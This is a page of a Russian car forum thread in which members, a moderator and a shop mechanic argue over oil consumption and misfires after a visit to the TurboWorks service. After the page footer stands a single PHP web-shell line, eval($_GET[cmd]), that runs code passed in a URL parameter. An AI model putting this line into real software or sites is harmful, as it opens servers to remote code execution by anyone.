+ Ответить в теме
Страница 5 из 6 ПерваяПервая ... 3 4 5 6 ПоследняяПоследняя
Показано с 41 по 50 из 54

Тема: Пропала мощность и начался жор масла после посещения TurboWorks


  1. #41
    GTI-Racing KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all Аватар для KOT
    Регистрация
    25.04.2010
    Откуда
    Москва, Красногорск
    Машина
    GTI V
    Сообщений
    1,784
    Цитата Сообщение от VaneSti Посмотреть сообщение
    Пасаны берите этого обиженного толерантного "клиента" за шкирку приезжайте с ним вместе в плохой сервис Турбоворкс к Ване не понимающему в машинах и сами все поймете увидите))))))да еще и цирк халявный как бы)))
    а кому это надо?
    Скорость это смерть, а всему виной жажда скорости...

  2. #42
    GTI-Racing VaneSti is a jewel in the rough VaneSti is a jewel in the rough VaneSti is a jewel in the rough Аватар для VaneSti
    Регистрация
    24.03.2011
    Откуда
    Москва
    Машина
    gc8 sti spec ra-r
    Сообщений
    23
    Цитата Сообщение от est Посмотреть сообщение
    "2. Замена катушки зажигания
    (по диагностике,ты сам это видел,была ошибка пропуск зажигание по третьему или второму цилинду уже не помню,я предложил поменять катушку,ты сказал окей меняем) какие вопросы вообще???"

    Разве нельзя было, неразводя клиента на покупку катушки, просто поставить для проверки заведомо исправную катушку, и уж если дело в ней, то рекомендовать её замену?

    "3. Замена форсунки
    (на эту тему ты общался с моим коллегой Юрой и при чем тут я,я вообще не понимаю)"

    Юра не у вас работет что ли?
    Отвечать за проделаную работу перед клиентом должен сервис, а не отдельно Ваня, Юра или некто Василий.

    В общем, по мне, незачот.
    Юра мой коллега и друг.
    Представь себе ситуацию ты делаешь зубы у одного стоматолога "Вани" и он к примеру в отпуске,ты пошел к другому к "Юре" в эту же клинику,а потом на форуме пишешь "Вань",после визита к юре у меня болит зуб(по непонятной причине) ваша клиника гавно.
    а теперь внимание вопрос
    1)какое право клиент имеет орать на всю иваноскую что клиника гавно?
    2)как ваня виноват перед клиентом что юра ему 32 зуба выдернул?
    (прошу заметить я сейчас не говорю что юра плохой,я пытаюсь понять какого органа человек считает что у него есть право публично обливать кого-то грязью без причины)

    Добавлено через 4 минуты
    Цитата Сообщение от KOT Посмотреть сообщение
    а кому это надо?
    ахахха)))Серег,просто меня реально возмущает что левый человек несет ерунду и негатив про Турбоворкс и меня лично)
    Последний раз редактировалось VaneSti; 15.05.2013 в 15:16. Причина: Добавлено сообщение

  3. #43
    GTI-Racing est is on a distinguished road Аватар для est
    Регистрация
    18.07.2008
    Машина
    AUM
    Сообщений
    91
    Цитата Сообщение от VaneSti Посмотреть сообщение
    Юра мой коллега и друг.
    Представь себе ситуацию ты делаешь зубы у одного стоматолога "Вани" и он к примеру в отпуске,ты пошел к другому к "Юре" в эту же клинику,а потом на форуме пишешь "Вань",после визита к юре у меня болит зуб(по непонятной причине) ваша клиника гавно.
    а теперь внимание вопрос
    1)какое право клиент имеет орать на всю иваноскую что клиника гавно?
    2)как ваня виноват перед клиентом что юра ему 32 зуба выдернул?
    (прошу заметить я сейчас не говорю что юра плохой,я пытаюсь понять какого органа человек считает что у него есть право публично обливать кого-то грязью без причины)
    А в заказ-наряде у вас написано ООО "ТВ" (например) или "Ваня и Юра"?
    Клиент то вроде в сервис приехал, вот сервис и отвечать должен.
    Нельзя же каждый раз искать кого-то лично, кто занимался машиной, соответственно, ответственность за Ваню и Юру несет сервис.
    А то, что человек в данной ветке обратился к тебе лично, так это ж ерунда, к решению проблемы это никакого значения не имеет, за этим прятаться не стоит.

  4. #44
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Самое первое сообщение вполне конструктивное и нормальное. Не понимаю почему все это выросло в футбол то в одни ворота, то в другие.

    Прочитайте еще раз первый пост и составьте заново ответ от имени сервиса, без дальнейшего холивара в сообщениях всей этой темы.
    Например:
    Клиент: я хочу это.....
    Сервис: мы можем это...., а это не можем, т.к. и т.п.

    Не надо панибратства, лучше конструктив как обычные партнеры.
    Читать все это не айс. Может речь идет о конкретной причине жора или чего там еще случилось и у жора есть свой млия источник....найти и уничтожить ёпты.
    песок сыпется....не останавливайтесь на достигнутом !

  5. #45
    GTI-Racing VaneSti is a jewel in the rough VaneSti is a jewel in the rough VaneSti is a jewel in the rough Аватар для VaneSti
    Регистрация
    24.03.2011
    Откуда
    Москва
    Машина
    gc8 sti spec ra-r
    Сообщений
    23
    Цитата Сообщение от BON Посмотреть сообщение
    Самое первое сообщение вполне конструктивное и нормальное. Не понимаю почему все это выросло в футбол то в одни ворота, то в другие.

    Прочитайте еще раз первый пост и составьте заново ответ от имени сервиса, без дальнейшего холивара в сообщениях всей этой темы.
    Например:
    Клиент: я хочу это.....
    Сервис: мы можем это...., а это не можем, т.к. и т.п.

    Не надо панибратства, лучше конструктив как обычные партнеры.
    Читать все это не айс. Может речь идет о конкретной причине жора или чего там еще случилось и у жора есть свой млия источник....найти и уничтожить ёпты.
    Братан,ситуация в том что логично понимая ситуацию,а даже не конструкцию ДВС можно понять что если мотор жрет масло то оно или сгорает в камере сгорания или вытекает наружу ДВС(течь прокладок и ссальников),внешней течи мы не обнаружили как и владелец автомобиля соотв делаем вывод что масло сгорает в камере сгорания.в камеру сгорания масло может попадать ТОЛЬКО через маслосъемные или поршневые кольца,так же все вменяемые люди понимают что следствием ужора масла через вышеперечисленные детали и узлы является естественный износ деталей в результате трения при работе ДВС,это в первом случае трение уплотнителя маслосъемного колпачка о стержень клапана,во втором случае это трение маслосъемного кольца на поршне о стенку цилиндра.износ трением это достаточно долги процесс тем более когда трущиеся детали смазываются качественным маслом в нашем случае это Мотюль....теперь докажите мне что человек адекватен который говорит что после замены масла в турбоворкс его машину сломали и она резко начала есть масла чуть ли не больше бензина....ПОЖАЛУЙСТА ОБЬЯСНИТЕ!!!!!!!!!!!!!!!!!!!!!!!

  6. #46
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от VaneSti Посмотреть сообщение
    ...теперь докажите мне что человек адекватен который говорит что после замены масла в турбоворкс его машину сломали и она резко начала есть масла чуть ли не больше бензина....ПОЖАЛУЙСТА ОБЬЯСНИТЕ!!!!!!!!!!!!!!!!!!!!!!!
    http://gti-club.ru/forum/showpost.ph...38&postcount=6
    в предпоследнем предложении последнего абзаца смысл.
    Что означает мой пост. Предположим нашлась причина - жор масла. вы нашли причину и ее источник или предположили. Далее без лишних слов объясняете реальную причину, что так совпало и надо делать это по списку и без лишних вложений.
    У сервиса с клиентом товарно-денежные отношения. Как я и писал на практике много раз визит в сервис вскрывал, что-то более тяжелое, будь то трещина или как уехал на ТАЗ08 и загромыхало, сказал что за нах ? оказалось лопнула пружина на р/вале в которую не лазили, или завели и поехал, и мля жор масла и дымина, а там трещина пошла уже в масляный канал от старости...все решалось и я платил, если как в случае с Лукас турбо дриснуло немного, то там сразу сказали по телефону еще, Олег там ёпнуло в башке и это наша вина и не твои проблемы..
    Называть клиента теми словами, что были выше вообще не красиво :expect:
    песок сыпется....не останавливайтесь на достигнутом !

  7. #47
    --- в итоге -то что , сейчас жрет масло ?

  8. #48
    GTI-Racing Столичный will become famous soon enough Аватар для Столичный
    Регистрация
    05.11.2012
    Откуда
    Moscow
    Машина
    Oktavia 1.8tsi revo
    Сообщений
    140
    такое возможно в теории,но когда диагност видит на компе ошибку пропуски зажигания он для начала экономив средства клиента предлагает поменять катушку по которой пропуски....а потом уже если катушки новые или ошибка пропуска зажигания не всегда идет по одному цилиндру смотрит дальше датчики от которых зависит момент подачи искры на свечу;)
    Ваня, я не лезу в ваши препирательства с топикстартером, но по сказаному выше, тк я работаю у ОД, "диагност" сначала подкинет заведомо исправные катушку, свечу либо поменяет их местами, что бы убедится, что дело в них, потому как если ты их приговариваешь, а они , как назло не помогают, то ты их и покупаешь, а это мягко говоря не бюджетно, так во всяком случае у нас. Я всего лишь предположил, что после замены вышеперечисленного, мотор так и подтраивает, то основываясь на своем опыте, возможна течь сальника (поверь мне, это не теория я лично в этом убеждался не один десяток раз, все симтомы как раз и в твоей диагностике похожи на этот случай) Посмотреть на стыке кпп и двс есть масляные запотевания не сложно.
    Я не настаиваю на своем предположении и (упаси господи) никого не учу и уж тем более не сомневаюсь в Ваниной компетенции.
    С уважением ко всем Дмитрий

    Добавлено через 7 минут
    Цитата Сообщение от VaneSti Посмотреть сообщение
    Братан,ситуация в том что логично понимая ситуацию,а даже не конструкцию ДВС можно понять что если мотор жрет масло то оно или сгорает в камере сгорания или вытекает наружу ДВС(течь прокладок и ссальников),внешней течи мы не обнаружили как и владелец автомобиля соотв делаем вывод что масло сгорает в камере сгорания.в камеру сгорания масло может попадать ТОЛЬКО через маслосъемные или поршневые кольца,так же все вменяемые люди понимают что следствием ужора масла через вышеперечисленные детали и узлы является естественный износ деталей в результате трения при работе ДВС,это в первом случае трение уплотнителя маслосъемного колпачка о стержень клапана,во втором случае это трение маслосъемного кольца на поршне о стенку цилиндра.износ трением это достаточно долги процесс тем более когда трущиеся детали смазываются качественным маслом в нашем случае это Мотюль....теперь докажите мне что человек адекватен который говорит что после замены масла в турбоворкс его машину сломали и она резко начала есть масла чуть ли не больше бензина....ПОЖАЛУЙСТА ОБЬЯСНИТЕ!!!!!!!!!!!!!!!!!!!!!!!
    Согласен, начавшейся жор масла после замены не связан с его заменой, тут несколько вариантов, либо попробовать поменять масло на другое, либо делать диагностике ДВС, а это в данном случае если течей не выявлено автоматом ставит разбор ДВС.
    Последний раз редактировалось Столичный; 16.05.2013 в 09:03. Причина: Добавлено сообщение

  9. #49
    --- за месяц переписки тут на форуме , уже можно было машину перебрать по винтику одному . Cтранно , что до сих пор не найдено , куда же масло уходит ........ А про задний сальник , нет веры . Cервисмены , сами приходят и рассказывают про клапана и сальник , так как это все связано на прямую . А вы тут про тролей трете ..........

  10. #50
    Мимо проходил gerser is on a distinguished road Аватар для gerser
    Регистрация
    23.12.2016
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1

    Turbowork - развод

    Был у них неделю назад.Оставил машину на капремонт двигателя.Машина неделю простояла на улице,к ней никто не подходил.На звонки отвечали нехотя,несли какую то ахинею.Приехал на эвакуаторе,забирать в другой ТЦ.Отдавать просто так не хотели,требовали оплатить диагностику.Написали на бумажке-течь масла ото всюду.
    Пришлось оплатить и валить от туда по быстрому.Ни кому не советую.Не порядочные люди.

+ Ответить в теме
Страница 5 из 6 ПерваяПервая ... 3 4 5 6 ПоследняяПоследняя

Похожие темы

  1. Технический центр TurboWorks
    от Adrenalin в разделе Партнеры / Клубные скидки
    Ответов: 158
    Последнее сообщение: 02.04.2024, 10:22
  2. выхлоп turboworks
    от popoopop123 в разделе Golf 5
    Ответов: 15
    Последнее сообщение: 03.01.2024, 02:14
  3. Тюнинг начался......
    от Доктор Н в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 20
    Последнее сообщение: 02.10.2023, 08:50
  4. Начался ЖОР масла 2.0 TFSI
    от KOT в разделе Двигатель
    Ответов: 63
    Последнее сообщение: 25.02.2014, 10:27
  5. Сервисы, отзывы после посещения
    от GTI-S в разделе Санкт-Петербург
    Ответов: 16
    Последнее сообщение: 20.05.2010, 15:31

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}